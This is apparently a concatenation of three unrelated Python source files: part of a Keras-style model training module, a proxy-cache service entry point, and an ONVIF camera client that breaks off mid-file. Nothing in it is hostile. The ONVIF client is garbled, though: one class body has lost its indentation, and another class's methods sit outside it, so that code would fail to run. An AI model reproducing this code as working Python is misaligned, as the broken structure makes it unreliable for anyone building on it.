                            'Found: ' + str(validation_data))
        val_x, val_y, val_sample_weights = self._standardize_user_data(val_x, val_y,
                                                                       sample_weight=val_sample_weight,
                                                                       check_batch_dim=False,
                                                                       batch_size=batch_size)
        self._make_test_function()
        val_f = self.test_function
        # Append the test-mode learning-phase flag (0.) when the phase
        # is a backend tensor rather than a fixed int.
        if self.uses_learning_phase and type(K.learning_phase()) is not int:
            val_ins = val_x + val_y + val_sample_weights + [0.]
        else:
            val_ins = val_x + val_y + val_sample_weights
    elif validation_split and 0. < validation_split < 1.:
        do_validation = True
        # Hold out the trailing fraction of the data for validation.
        split_at = int(len(x[0]) * (1. - validation_split))
        x, val_x = (slice_X(x, 0, split_at), slice_X(x, split_at))
        y, val_y = (slice_X(y, 0, split_at), slice_X(y, split_at))
        sample_weights, val_sample_weights = (
            slice_X(sample_weights, 0, split_at), slice_X(sample_weights, split_at))
        self._make_test_function()
        val_f = self.test_function
        if self.uses_learning_phase and type(K.learning_phase()) is not int:
            val_ins = val_x + val_y + val_sample_weights + [0.]
        else:
            val_ins = val_x + val_y + val_sample_weights
    else:
        do_validation = False
        val_f = None
        val_ins = None

    # prepare input arrays and training function (train-mode flag = 1.)
    if self.uses_learning_phase and type(K.learning_phase()) is not int:
        ins = x + y + sample_weights + [1.]
    else:
        ins = x + y + sample_weights
    self._make_train_function()
    f = self.train_function

    # prepare display labels
    out_labels = self.metrics_names

    # rename duplicated metrics name
    # (can happen with an output layer shared among multiple dataflows)
    deduped_out_labels = []
    for i, label in enumerate(out_labels):
        new_label = label
        if out_labels.count(label) > 1:
            dup_idx = out_labels[:i].count(label)
            new_label += '_' + str(dup_idx + 1)
        deduped_out_labels.append(new_label)
    out_labels = deduped_out_labels

    if do_validation:
        callback_metrics = copy.copy(out_labels) + ['val_' + n for n in out_labels]
    else:
        callback_metrics = copy.copy(out_labels)

    # delegate logic to _fit_loop
    return self._fit_loop(f, ins, out_labels=out_labels,
                          batch_size=batch_size, nb_epoch=nb_epoch,
                          verbose=verbose, callbacks=callbacks,
                          val_f=val_f, val_ins=val_ins, shuffle=shuffle,
                          callback_metrics=callback_metrics)
def evaluate(self, x, y, batch_size=32, verbose=1, sample_weight=None):
    '''Returns the loss value and metrics values for the model
    in test mode. Computation is done in batches.

    # Arguments
        x: Numpy array of test data, or list of Numpy arrays if the model
            has multiple inputs. Named inputs also accept a dict mapping
            input names to Numpy arrays.
        y: Numpy array of target data, or list of Numpy arrays if the
            model has multiple outputs. Named outputs also accept a dict
            mapping output names to Numpy arrays.
        batch_size: integer. Number of samples per gradient update.

    # Returns
        Scalar test loss (if the model has a single output and no metrics)
        or list of scalars (if the model has multiple outputs
        and/or metrics). The attribute `model.metrics_names` will give you
        the display labels for the scalar outputs.
    '''
    # validate user data
    x, y, sample_weights = self._standardize_user_data(
        x, y,
        sample_weight=sample_weight,
        check_batch_dim=False,
        batch_size=batch_size)
    # prepare inputs: test mode appends learning-phase flag 0. when the
    # phase is a backend tensor rather than a fixed int
    ins = x + y + sample_weights
    if self.uses_learning_phase and type(K.learning_phase()) is not int:
        ins = ins + [0.]
    # delegate the batching logic to _test_loop
    self._make_test_function()
    return self._test_loop(self.test_function, ins,
                           batch_size=batch_size,
                           verbose=verbose)
def predict(self, x, batch_size=32, verbose=0):
    '''Generates output predictions for the input samples,
    processing the samples in a batched way.

    # Arguments
        x: the input data, as a Numpy array
            (or list of Numpy arrays if the model has multiple outputs).
        batch_size: integer.
        verbose: verbosity mode, 0 or 1.

    # Returns
        A Numpy array of predictions.
    '''
    # validate user data
    x = standardize_input_data(x, self.input_names,
                               self.internal_input_shapes,
                               check_batch_dim=False)
    if self.stateful:
        nb = x[0].shape[0]
        # Stateful networks carry state across batches: incomplete
        # batches are only tolerated when everything fits in one batch.
        if nb > batch_size and nb % batch_size != 0:
            raise Exception('In a stateful network, '
                            'you should only pass inputs with '
                            'a number of samples that can be '
                            'divided by the batch size. Found: ' +
                            str(nb) + ' samples. '
                            'Batch size: ' + str(batch_size) + '.')
    # prepare inputs (test-mode learning-phase flag), delegate to _predict_loop
    ins = x
    if self.uses_learning_phase and type(K.learning_phase()) is not int:
        ins = x + [0.]
    self._make_predict_function()
    return self._predict_loop(self.predict_function, ins,
                              batch_size=batch_size, verbose=verbose)
def train_on_batch(self, x, y,
                   sample_weight=None, class_weight=None):
    '''Runs a single gradient update on a single batch of data.

    # Arguments
        x: Numpy array of training data, or list of Numpy arrays if the
            model has multiple inputs. Named inputs also accept a dict
            mapping input names to Numpy arrays.
        y: Numpy array of target data, or list of Numpy arrays if the
            model has multiple outputs. Named outputs also accept a dict
            mapping output names to Numpy arrays.
        sample_weight: optional array of the same length as x, containing
            weights to apply to the model's loss for each sample.
            For temporal data pass a 2D array (samples, sequence_length)
            and set sample_weight_mode="temporal" in compile().
        class_weight: optional dictionary mapping class indices (integers)
            to a weight (float) applied to the loss for samples of that
            class during training.

    # Returns
        Scalar training loss (if the model has a single output and no
        metrics) or list of scalars (if the model has multiple outputs
        and/or metrics). The attribute `model.metrics_names` will give
        you the display labels for the scalar outputs.
    '''
    x, y, sample_weights = self._standardize_user_data(
        x, y,
        sample_weight=sample_weight,
        class_weight=class_weight,
        check_batch_dim=True)
    # train mode: learning-phase flag is 1. when the phase is a tensor
    ins = x + y + sample_weights
    if self.uses_learning_phase and type(K.learning_phase()) is not int:
        ins += [1.]
    self._make_train_function()
    outputs = self.train_function(ins)
    return outputs[0] if len(outputs) == 1 else outputs
def test_on_batch(self, x, y, sample_weight=None):
    '''Test the model on a single batch of samples.

    # Arguments
        x: Numpy array of test data, or list of Numpy arrays if the model
            has multiple inputs. Named inputs also accept a dict mapping
            input names to Numpy arrays.
        y: Numpy array of target data, or list of Numpy arrays if the
            model has multiple outputs. Named outputs also accept a dict
            mapping output names to Numpy arrays.
        sample_weight: optional array of the same length as x, containing
            weights to apply to the model's loss for each sample.
            For temporal data pass a 2D array (samples, sequence_length)
            and set sample_weight_mode="temporal" in compile().

    # Returns
        Scalar test loss (if the model has a single output and no
        metrics) or list of scalars (if the model has multiple outputs
        and/or metrics). The attribute `model.metrics_names` will give
        you the display labels for the scalar outputs.
    '''
    x, y, sample_weights = self._standardize_user_data(
        x, y,
        sample_weight=sample_weight,
        check_batch_dim=True)
    # test mode: learning-phase flag is 0. when the phase is a tensor
    ins = x + y + sample_weights
    if self.uses_learning_phase and type(K.learning_phase()) is not int:
        ins += [0.]
    self._make_test_function()
    outputs = self.test_function(ins)
    return outputs[0] if len(outputs) == 1 else outputs
def predict_on_batch(self, x):
    '''Returns predictions for a single batch of samples.
    '''
    x = standardize_input_data(x, self.input_names,
                               self.internal_input_shapes)
    # test mode: learning-phase flag is 0. when the phase is a tensor
    ins = x
    if self.uses_learning_phase and type(K.learning_phase()) is not int:
        ins = x + [0.]
    self._make_predict_function()
    outputs = self.predict_function(ins)
    return outputs[0] if len(outputs) == 1 else outputs
def fit_generator(self, generator, samples_per_epoch, nb_epoch,
                  verbose=1, callbacks=[],
                  validation_data=None, nb_val_samples=None,
                  class_weight={}, max_q_size=10, nb_worker=1, pickle_safe=False):
    '''Fits the model on data generated batch-by-batch by
    a Python generator.
    The generator is run in parallel to the model, for efficiency.
    For instance, this allows you to do real-time data augmentation
    on images on CPU in parallel to training your model on GPU.

    # Arguments
        generator: a generator.
            The output of the generator must be either
            - a tuple (inputs, targets)
            - a tuple (inputs, targets, sample_weights).
            All arrays should contain the same number of samples.
            The generator is expected to loop over its data
            indefinitely. An epoch finishes when `samples_per_epoch`
            samples have been seen by the model.
        samples_per_epoch: integer, number of samples to process before
            going to the next epoch.
        nb_epoch: integer, total number of iterations on the data.
        verbose: verbosity mode, 0, 1, or 2.
        callbacks: list of callbacks to be called during training.
        validation_data: this can be either
            - a generator for the validation data
            - a tuple (inputs, targets)
            - a tuple (inputs, targets, sample_weights).
        nb_val_samples: only relevant if `validation_data` is a generator.
            number of samples to use from validation generator
            at the end of every epoch.
        class_weight: dictionary mapping class indices to a weight
            for the class.
        max_q_size: maximum size for the generator queue
        nb_worker: maximum number of processes to spin up when using
            process based threading
        pickle_safe: if True, use process based threading. Note that because
            this implementation relies on multiprocessing, you should not pass
            non picklable arguments to the generator as they can't be passed
            easily to children processes.

    # Returns
        A `History` object.

    # Example

    ```python
        def generate_arrays_from_file(path):
            while 1:
                f = open(path)
                for line in f:
                    # create numpy arrays of input data
                    # and labels, from each line in the file
                    x1, x2, y = process_line(line)
                    yield ({'input_1': x1, 'input_2': x2}, {'output': y})
                f.close()

        model.fit_generator(generate_arrays_from_file('/my_file.txt'),
                            samples_per_epoch=10000, nb_epoch=10)
    ```
    '''
    # NOTE(review): `callbacks=[]` and `class_weight={}` are mutable
    # defaults; neither is mutated below (`callbacks` is rebound), but
    # they are still a latent hazard.
    wait_time = 0.01  # in seconds
    epoch = 0
    do_validation = bool(validation_data)
    self._make_train_function()
    if do_validation:
        self._make_test_function()

    # python 2 has 'next', 3 has '__next__'
    # avoid any explicit version checks
    val_gen = (hasattr(validation_data, 'next') or
               hasattr(validation_data, '__next__'))
    if val_gen and not nb_val_samples:
        raise Exception('When using a generator for validation data, '
                        'you must specify a value for "nb_val_samples".')

    out_labels = self.metrics_names
    callback_metrics = out_labels + ['val_' + n for n in out_labels]

    # prepare callbacks
    self.history = cbks.History()
    callbacks = [cbks.BaseLogger()] + callbacks + [self.history]
    if verbose:
        callbacks += [cbks.ProgbarLogger()]
    callbacks = cbks.CallbackList(callbacks)

    # it's possible to callback a different model than self:
    if hasattr(self, 'callback_model') and self.callback_model:
        callback_model = self.callback_model
    else:
        callback_model = self
    callbacks._set_model(callback_model)
    callbacks._set_params({
        'nb_epoch': nb_epoch,
        'nb_sample': samples_per_epoch,
        'verbose': verbose,
        'do_validation': do_validation,
        'metrics': callback_metrics,
    })
    callbacks.on_train_begin()

    # Non-generator validation data is standardized once, up front.
    if do_validation and not val_gen:
        if len(validation_data) == 2:
            val_x, val_y = validation_data
            val_sample_weight = None
        elif len(validation_data) == 3:
            val_x, val_y, val_sample_weight = validation_data
        else:
            raise Exception('validation_data should be a tuple '
                            '(val_x, val_y, val_sample_weight) '
                            'or (val_x, val_y). Found: ' + str(validation_data))
        val_x, val_y, val_sample_weights = self._standardize_user_data(val_x, val_y, val_sample_weight)
        self.validation_data = val_x + [val_y, val_sample_weights]
    else:
        self.validation_data = None

    # start generator thread storing batches into a queue
    data_gen_queue, _stop = generator_queue(generator, max_q_size=max_q_size, nb_worker=nb_worker,
                                            pickle_safe=pickle_safe)

    callback_model.stop_training = False
    while epoch < nb_epoch:
        callbacks.on_epoch_begin(epoch)
        samples_seen = 0
        batch_index = 0
        while samples_seen < samples_per_epoch:
            generator_output = None
            # Poll the producer queue (busy-wait with short sleeps) until
            # a batch arrives or the stop event is set.
            while not _stop.is_set():
                if not data_gen_queue.empty():
                    generator_output = data_gen_queue.get()
                    break
                else:
                    time.sleep(wait_time)

            # `generator_output` stays None if the stop event fired; the
            # hasattr check below then raises with the offending value.
            if not hasattr(generator_output, '__len__'):
                _stop.set()
                raise Exception('output of generator should be a tuple '
                                '(x, y, sample_weight) '
                                'or (x, y). Found: ' + str(generator_output))
            if len(generator_output) == 2:
                x, y = generator_output
                sample_weight = None
            elif len(generator_output) == 3:
                x, y, sample_weight = generator_output
            else:
                _stop.set()
                raise Exception('output of generator should be a tuple '
                                '(x, y, sample_weight) '
                                'or (x, y). Found: ' + str(generator_output))
            # build batch logs
            batch_logs = {}
            # The batch size is inferred from whichever container shape
            # the generator produced (list / dict / single array).
            if type(x) is list:
                batch_size = x[0].shape[0]
            elif type(x) is dict:
                batch_size = list(x.values())[0].shape[0]
            else:
                batch_size = x.shape[0]
            batch_logs['batch'] = batch_index
            batch_logs['size'] = batch_size
            callbacks.on_batch_begin(batch_index, batch_logs)

            try:
                outs = self.train_on_batch(x, y,
                                           sample_weight=sample_weight,
                                           class_weight=class_weight)
            except:
                # Stop the generator thread before propagating any error.
                _stop.set()
                raise

            if type(outs) != list:
                outs = [outs]
            for l, o in zip(out_labels, outs):
                batch_logs[l] = o

            callbacks.on_batch_end(batch_index, batch_logs)

            # construct epoch logs
            epoch_logs = {}
            batch_index += 1
            samples_seen += batch_size

            # epoch finished
            if samples_seen > samples_per_epoch:
                warnings.warn('Epoch comprised more than '
                              '`samples_per_epoch` samples, '
                              'which might affect learning results. '
                              'Set `samples_per_epoch` correctly '
                              'to avoid this warning.')
            if samples_seen >= samples_per_epoch and do_validation:
                if val_gen:
                    val_outs = self.evaluate_generator(validation_data,
                                                       nb_val_samples,
                                                       max_q_size=max_q_size)
                else:
                    # no need for try/except because
                    # data has already been validated
                    val_outs = self.evaluate(val_x, val_y,
                                             batch_size=batch_size,
                                             sample_weight=val_sample_weights,
                                             verbose=0)
                if type(val_outs) is not list:
                    val_outs = [val_outs]
                # same labels assumed
                for l, o in zip(out_labels, val_outs):
                    epoch_logs['val_' + l] = o

        callbacks.on_epoch_end(epoch, epoch_logs)
        epoch += 1
        if callback_model.stop_training:
            break

    _stop.set()
    if pickle_safe:
        data_gen_queue.close()
    callbacks.on_train_end()
    return self.history
def evaluate_generator(self, generator, val_samples, max_q_size=10, nb_worker=1, pickle_safe=False):
    '''Evaluates the model on a data generator. The generator should
    return the same kind of data as accepted by `test_on_batch`.

    Arguments:
        generator:
            generator yielding tuples (inputs, targets)
            or (inputs, targets, sample_weights)
        val_samples:
            total number of samples to generate from `generator`
            before returning.
        max_q_size: maximum size for the generator queue
        nb_worker: maximum number of processes to spin up when using
            process based threading
        pickle_safe: if True, use process based threading. Note that because
            this implementation relies on multiprocessing, you should not pass
            non picklable arguments to the generator as they can't be passed
            easily to children processes.

    # Returns
        Scalar test loss (if the model has a single output and no metrics)
        or list of scalars (if the model has multiple outputs
        and/or metrics). The attribute `model.metrics_names` will give you
        the display labels for the scalar outputs.
    '''
    self._make_test_function()

    processed_samples = 0
    wait_time = 0.01
    all_outs = []       # per-batch outputs of test_on_batch
    weights = []        # per-batch sample counts, used as averaging weights
    data_gen_queue, _stop = generator_queue(generator, max_q_size=max_q_size, nb_worker=nb_worker,
                                            pickle_safe=pickle_safe)

    while processed_samples < val_samples:
        generator_output = None
        # Poll the producer queue (busy-wait with short sleeps) until a
        # batch arrives or the stop event is set.
        while not _stop.is_set():
            if not data_gen_queue.empty():
                generator_output = data_gen_queue.get()
                break
            else:
                time.sleep(wait_time)

        # `generator_output` stays None if the stop event fired; the
        # hasattr check below then raises with the offending value.
        if not hasattr(generator_output, '__len__'):
            _stop.set()
            raise Exception('output of generator should be a tuple '
                            '(x, y, sample_weight) '
                            'or (x, y). Found: ' + str(generator_output))
        if len(generator_output) == 2:
            x, y = generator_output
            sample_weight = None
        elif len(generator_output) == 3:
            x, y, sample_weight = generator_output
        else:
            _stop.set()
            raise Exception('output of generator should be a tuple '
                            '(x, y, sample_weight) '
                            'or (x, y). Found: ' + str(generator_output))
        try:
            outs = self.test_on_batch(x, y, sample_weight=sample_weight)
        except:
            # Stop the generator thread before propagating any error.
            _stop.set()
            raise

        # Infer the batch's sample count from the input container shape.
        if type(x) is list:
            nb_samples = len(x[0])
        elif type(x) is dict:
            nb_samples = len(list(x.values())[0])
        else:
            nb_samples = len(x)
        all_outs.append(outs)

        processed_samples += nb_samples
        weights.append(nb_samples)

    _stop.set()
    if pickle_safe:
        data_gen_queue.close()
    # Average the per-batch results, weighted by batch size. `outs` here
    # is the last batch's output, used only to detect single- vs
    # multi-output models.
    if type(outs) is not list:
        return np.average(np.asarray(all_outs),
                          weights=weights)
    else:
        averages = []
        for i in range(len(outs)):
            averages.append(np.average([out[i] for out in all_outs],
                                       weights=weights))
        return averages
def predict_generator(self, generator, val_samples, max_q_size=10, nb_worker=1, pickle_safe=False):
    '''Generates predictions for the input samples from a data generator.
    The generator should return the same kind of data as accepted by
    `predict_on_batch`.

    # Arguments
        generator: generator yielding batches of input samples.
        val_samples: total number of samples to generate from `generator`
            before returning.
        max_q_size: maximum size for the generator queue
        nb_worker: maximum number of processes to spin up when using
            process based threading
        pickle_safe: if True, use process based threading. Note that because
            this implementation relies on multiprocessing, you should not pass
            non picklable arguments to the generator as they can't be passed
            easily to children processes.

    # Returns
        Numpy array(s) of predictions.
    '''
    self._make_predict_function()

    processed_samples = 0
    wait_time = 0.01
    all_outs = []   # one pre-allocated array per model output
    data_gen_queue, _stop = generator_queue(generator, max_q_size=max_q_size, nb_worker=nb_worker,
                                            pickle_safe=pickle_safe)

    while processed_samples < val_samples:
        generator_output = None
        # Poll the producer queue (busy-wait with short sleeps) until a
        # batch arrives or the stop event is set.
        while not _stop.is_set():
            if not data_gen_queue.empty():
                generator_output = data_gen_queue.get()
                break
            else:
                time.sleep(wait_time)

        # The generator may yield bare inputs, or (x, y[, sample_weight])
        # tuples whose targets/weights are simply ignored here.
        if isinstance(generator_output, tuple):
            if len(generator_output) == 2:
                x, y = generator_output
                sample_weight = None
            elif len(generator_output) == 3:
                x, y, sample_weight = generator_output
            else:
                _stop.set()
                raise Exception('output of generator should be a tuple '
                                '(x, y, sample_weight) '
                                'or (x, y). Found: ' + str(generator_output))
        else:
            x = generator_output

        try:
            outs = self.predict_on_batch(x)
        except:
            # Stop the generator thread before propagating any error.
            _stop.set()
            raise

        # Infer the batch's sample count from the input container shape.
        if type(x) is list:
            nb_samples = len(x[0])
        elif type(x) is dict:
            nb_samples = len(list(x.values())[0])
        else:
            nb_samples = len(x)

        if type(outs) != list:
            outs = [outs]

        if len(all_outs) == 0:
            # First batch: allocate full-size output arrays.
            for out in outs:
                shape = (val_samples,) + out.shape[1:]
                all_outs.append(np.zeros(shape, dtype=K.floatx()))

        for i, out in enumerate(outs):
            all_outs[i][processed_samples:(processed_samples + nb_samples)] = out
        processed_samples += nb_samples

    _stop.set()
    if pickle_safe:
        data_gen_queue.close()
    if len(all_outs) == 1:
        return all_outs[0]
    return all_outs
|
main.py | import argparse
from concurrent.futures import ThreadPoolExecutor
import os
import signal
import sys
import time
import threading
from proxycache.http_server import AsyncHTTPServer
from proxycache.lrucache import LRUCache
from proxycache.rate_limiter import Limiter
from proxycache.db import RedisKVStore
def setup_signal_handlers(server):
    """Install SIGINT/SIGTERM handlers that stop `server` gracefully.

    `server` must expose a no-argument `stop()` method.
    """
    # FIX: the handler parameter was named `signal`, shadowing the
    # `signal` module inside the handler body. Renamed to the
    # conventional `signum`/`frame`.
    def signal_handler(signum, frame):
        server.stop()
    signal.signal(signal.SIGINT, signal_handler)
    signal.signal(signal.SIGTERM, signal_handler)
def get_service_config():
    """Read proxy service settings from the environment.

    Returns a (host, port, max_keys, ttl_ms) tuple; port/max_keys/ttl_ms
    are parsed as ints. Prints a message and exits with status 1 if a
    variable is missing or not a valid integer.
    """
    try:
        return (
            os.environ['PROXY_HOST'],
            int(os.environ['PROXY_PORT']),
            int(os.environ['PROXY_MAX_KEYS']),
            int(os.environ['PROXY_TTL_MS']))
    except (KeyError, ValueError):
        # FIX: narrowed from a blanket `except Exception`, which would
        # also swallow unrelated failures. Only a missing variable
        # (KeyError) or a malformed integer (ValueError) is expected.
        print('Unable to find server config settings')
        sys.exit(1)
def get_redis_config():
    """Read Redis connection settings from the environment.

    Returns a (host, port) tuple with port parsed as int. Prints a
    message and exits with status 1 if a variable is missing or the
    port is not a valid integer.
    """
    try:
        return (
            os.environ['REDIS_HOST'],
            int(os.environ['REDIS_PORT']))
    except (KeyError, ValueError):
        # FIX: narrowed from a blanket `except Exception` — only a
        # missing variable (KeyError) or a malformed integer
        # (ValueError) is expected here.
        print('Unable to find server host/port settings')
        sys.exit(1)
def main():
    """Wire together the cache, rate limiter and HTTP front-end, then
    serve until a signal handler stops the server."""
    host, port, max_keys, ttl_ms = get_service_config()
    redis_host, redis_port = get_redis_config()
    db = RedisKVStore(host=redis_host, port=redis_port)
    cache = LRUCache(max_keys, ttl_ms, db)
    cache_executor = ThreadPoolExecutor(max_workers=1)
    rate_limiter = Limiter()
    httpd = AsyncHTTPServer(host, port,
                            cache.get, cache_executor, rate_limiter)
    setup_signal_handlers(httpd)
    # start the server event loop on its own thread
    server_thread = threading.Thread(target=httpd.run)
    server_thread.start()
    # poll until the server reports it has stopped, then reap the thread
    while httpd.is_running():
        time.sleep(0.2)
    server_thread.join()


if __name__ == '__main__':
    main()
client.py | from __future__ import print_function, division
__version__ = '0.0.1'
import datetime as dt
import logging
import os.path
from threading import Thread, RLock
from urllib.parse import urlparse
from zeep.client import Client, CachingClient, Settings
from zeep.wsse.username import UsernameToken
import zeep.helpers
from onvif.exceptions import ONVIFError
from onvif.definition import SERVICES
logger = logging.getLogger('onvif')
logging.basicConfig(level=logging.INFO)
logging.getLogger('zeep.client').setLevel(logging.CRITICAL)
# Ensure methods raise an ONVIFError exception when something goes wrong.
def safe_func(func):
    """Decorator converting any exception raised by `func` into an
    ONVIFError, chaining the original exception as the cause."""
    import functools

    # FIX: preserve the wrapped function's metadata (__name__, __doc__)
    # and chain the original exception so the real traceback survives.
    @functools.wraps(func)
    def wrapped(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except Exception as err:
            raise ONVIFError(err) from err
    return wrapped
class UsernameDigestTokenDtDiff(UsernameToken):
    """
    UsernameDigestToken class, with a time offset parameter that can be adjusted;
    This allows authentication on cameras without being time synchronized.
    Please note that using NTP on both ends is the recommended solution,
    this should only be used in "safe" environments.
    """
    def __init__(self, user, passw, dt_diff=None, **kwargs):
        super().__init__(user, passw, **kwargs)
        self.dt_diff = dt_diff  # Date/time difference in datetime.timedelta

    def apply(self, envelope, headers):
        # Remember the configured `created` value so each request gets a
        # fresh, offset-adjusted timestamp without leaking state between
        # calls.
        old_created = self.created
        if self.created is None:
            self.created = dt.datetime.utcnow()
        if self.dt_diff is not None:
            # Shift the token timestamp to match the camera's clock.
            self.created += self.dt_diff
        result = super().apply(envelope, headers)
        # Restore the original value so the next call recomputes it.
        self.created = old_created
        return result
class ONVIFService(object):
"""
Python Implemention for ONVIF Service.
Services List:
DeviceMgmt DeviceIO Event AnalyticsDevice Display Imaging Media
PTZ Receiver RemoteDiscovery Recording Replay Search Extension
>>> from onvif import ONVIFService
>>> device_service = ONVIFService('http://192.168.0.112/onvif/device_service',
... 'admin', 'foscam',
... '/etc/onvif/wsdl/devicemgmt.wsdl')
>>> ret = device_service.GetHostname()
>>> print ret.FromDHCP
>>> print ret.Name
>>> device_service.SetHostname(dict(Name='newhostname'))
>>> ret = device_service.GetSystemDateAndTime()
>>> print ret.DaylightSavings
>>> print ret.TimeZone
>>> dict_ret = device_service.to_dict(ret)
>>> print dict_ret['TimeZone']
There are two ways to pass parameter to services methods
1. Dict
params = {'Name': 'NewHostName'}
device_service.SetHostname(params)
2. Type Instance
params = device_service.create_type('SetHostname')
params.Hostname = 'NewHostName'
device_service.SetHostname(params)
"""
@safe_func
def __init__(self, xaddr, user, passwd, url,
encrypt=True, daemon=False, zeep_client=None, no_cache=False,
dt_diff=None, binding_name='', transport=None):
if not os.path.isfile(url):
raise ONVIFError('%s doesn`t exist!' % url)
self.url = url
self.xaddr = xaddr
wsse = UsernameDigestTokenDtDiff(user, passwd, dt_diff=dt_diff, use_digest=encrypt)
# Create soap client
if not zeep_client:
ClientType = Client if no_cache else CachingClient
settings = Settings()
settings.strict = False
settings.xml_huge_tree = True
self.zeep_client = ClientType(wsdl=url, wsse=wsse, transport=transport, settings=settings)
else:
self.zeep_client = zeep_client
self.ws_client = self.zeep_client.create_service(binding_name, self.xaddr)
# Set soap header for authentication
self.user = user
self.passwd = passwd
# Indicate wether password digest is needed
self.encrypt = encrypt
self.daemon = daemon
self.dt_diff = dt_diff
self.create_type = lambda x: self.zeep_client.get_element('ns0:' + x)()
@classmethod
@safe_func
def clone(cls, service, *args, **kwargs):
clone_service = service.ws_client.clone()
kwargs['ws_client'] = clone_service
return ONVIFService(*args, **kwargs)
@staticmethod
@safe_func
def to_dict(zeepobject):
# Convert a WSDL Type instance into a dictionary
return {} if zeepobject is None else zeep.helpers.serialize_object(zeepobject)
def service_wrapper(self, func):
@safe_func
def wrapped(params=None, callback=None):
def call(params=None, callback=None):
# No params
# print(params.__class__.__mro__)
if params is None:
params = {}
else:
params = ONVIFService.to_dict(params)
try:
ret = func(**params)
except TypeError:
ret = func(params)
if callable(callback):
callback(ret)
return ret
if self.daemon:
th = Thread(target=call, args=(params, callback))
th.daemon = True
th.start()
else:
return call(params, callback)
return wrapped
def __getattr__(self, name):
    """
    Call the real onvif Service operations,
    See the official wsdl definition for the
    APIs detail(API name, request parameters,
    response parameters, parameter types, etc...)
    """
    builtin = name.startswith('__') and name.endswith('__')
    if builtin:
        # Bug fix: __getattr__ must raise AttributeError for missing names.
        # The old bare dict lookup raised KeyError, which breaks protocols
        # that probe for optional dunder attributes (copy, pickle, inspect).
        try:
            return self.__dict__[name]
        except KeyError:
            raise AttributeError(name)
    else:
        # Everything else is assumed to be an ONVIF operation on the proxy.
        return self.service_wrapper(getattr(self.ws_client, name))
class ONVIFCamera(object):
    """
    Python Implementation of an ONVIF compliant device.
    This class integrates ONVIF services.
    adjust_time parameter allows authentication on cameras without being time synchronized.
    Please note that using NTP on both ends is the recommended solution;
    this should only be used in "safe" environments.
    Also, this cannot be used on AXIS cameras, as every request is authenticated, contrary to the ONVIF standard.
    >>> from onvif import ONVIFCamera
    >>> mycam = ONVIFCamera('192.168.0.112', 80, 'admin', '12345')
    >>> mycam.devicemgmt.GetServices(False)
    >>> media_service = mycam.create_media_service()
    >>> ptz_service = mycam.create_ptz_service()
    # Get PTZ Configuration:
    >>> ptz_service.GetConfiguration()
    """
    # Class-level variables.
    # NOTE(review): these are mutable CLASS attributes, shared across every
    # ONVIFCamera instance in the process; create_onvif_service() writes into
    # services_template, so state leaks between cameras -- confirm whether a
    # single-camera process is assumed, or move these into __init__.
    services_template = {'devicemgmt': None, 'ptz': None, 'media': None,
                         'imaging': None, 'events': None, 'analytics': None}
    use_services_template = {'devicemgmt': True, 'ptz': True, 'media': True,
                             'imaging': True, 'events': True, 'analytics': True}
def __init__(self, host, port, user, passwd,
             wsdl_dir=os.path.join(os.path.dirname(os.path.dirname(__file__)),
                                   "wsdl"),
             encrypt=True, daemon=False, no_cache=False, adjust_time=False,
             transport=None, replace_netloc=False):
    """Connect to an ONVIF device and discover its service endpoints.

    :param host: device hostname/IP (may already include http(s) scheme)
    :param port: device port
    :param user: authentication username
    :param passwd: authentication password
    :param wsdl_dir: directory containing the local ONVIF WSDL files
    :param encrypt: use password digest for WS-Security
    :param daemon: run service calls in background daemon threads
    :param no_cache: disable WSDL caching in the SOAP client
    :param adjust_time: compensate for device/host clock skew
    :param transport: optional zeep transport
    :param replace_netloc: rewrite device-reported XAddrs to host:port
    """
    # HTTP(S) proxies would intercept direct device communication.
    for proxy_var in ('http_proxy', 'https_proxy'):
        os.environ.pop(proxy_var, None)
    self.host = host
    self.port = int(port)
    self.user = user
    self.passwd = passwd
    self.wsdl_dir = wsdl_dir
    self.encrypt = encrypt
    self.daemon = daemon
    self.no_cache = no_cache
    self.adjust_time = adjust_time
    self.transport = transport
    # Container of active per-service clients, guarded by services_lock.
    self.services = {}
    self.services_lock = RLock()
    # Discover every service XAddr advertised by the device.
    self.update_xaddrs(replace_netloc)
    self.to_dict = ONVIFService.to_dict
def update_xaddrs(self, replace_netloc=False):
    """Query the device and (re)build the namespace -> XAddr endpoint map.

    :param replace_netloc: if True, substitute the device-reported host:port
        in each XAddr with the one we connected on (NAT / port forwarding).
    """
    # Establish devicemgmt service first -- its endpoint is fixed, so it
    # works before we know any XAddrs.
    self.dt_diff = None
    self.devicemgmt = self.create_devicemgmt_service()
    if self.adjust_time:
        # Compute the camera/host clock offset so WS-Security timestamps are
        # accepted by devices that are not NTP-synchronised, then rebuild
        # devicemgmt with the offset applied.
        cdate = self.devicemgmt.GetSystemDateAndTime().UTCDateTime
        cam_date = dt.datetime(cdate.Date.Year, cdate.Date.Month, cdate.Date.Day,
                               cdate.Time.Hour, cdate.Time.Minute, cdate.Time.Second)
        self.dt_diff = cam_date - dt.datetime.utcnow()
        self.devicemgmt.dt_diff = self.dt_diff
        self.devicemgmt = self.create_devicemgmt_service()
    # Get XAddr of services on the device.
    self.xaddrs = {}
    capabilities = self.devicemgmt.GetCapabilities({'Category': 'All'})
    for name in capabilities:
        capability = capabilities[name]
        try:
            if name.lower() in SERVICES and capability is not None:
                ns = SERVICES[name.lower()]['ns']
                xaddr = capability['XAddr']
                if replace_netloc:
                    xaddr = urlparse(xaddr)
                    xaddr = xaddr._replace(netloc = '%s:%s' % (self.host, self.port))
                    xaddr = xaddr.geturl()
                self.xaddrs[ns] = xaddr
        except Exception:
            logger.exception('Unexpected service type')
    with self.services_lock:
        try:
            # Best effort: not every device supports pull-point eventing, so
            # failures here are deliberately swallowed.
            self.event = self.create_events_service()
            self.xaddrs['http://www.onvif.org/ver10/events/wsdl/PullPointSubscription'] = \
                self.event.CreatePullPointSubscription().SubscriptionReference.Address._value_1
        except Exception:
            pass
def update_url(self, host=None, port=None):
    """Re-point all existing service clients at a new host and/or port.

    No-op when neither value actually changes.

    :param host: new hostname/IP, or None to keep the current one
    :param port: new port, or None to keep the current one
    """
    changed = False
    if host and self.host != host:
        changed = True
        self.host = host
    if port and self.port != port:
        changed = True
        self.port = port
    if not changed:
        return
    self.devicemgmt = self.create_devicemgmt_service()
    self.capabilities = self.devicemgmt.GetCapabilities()
    with self.services_lock:
        for sname in self.services.keys():
            # Bug fix: capitalize() must be CALLED -- the old code passed the
            # bound method object to getattr(), which raises TypeError
            # because attribute names must be strings.
            xaddr = getattr(self.capabilities, sname.capitalize()).XAddr
            self.services[sname].ws_client.set_options(location=xaddr)
def get_service(self, name, create=True):
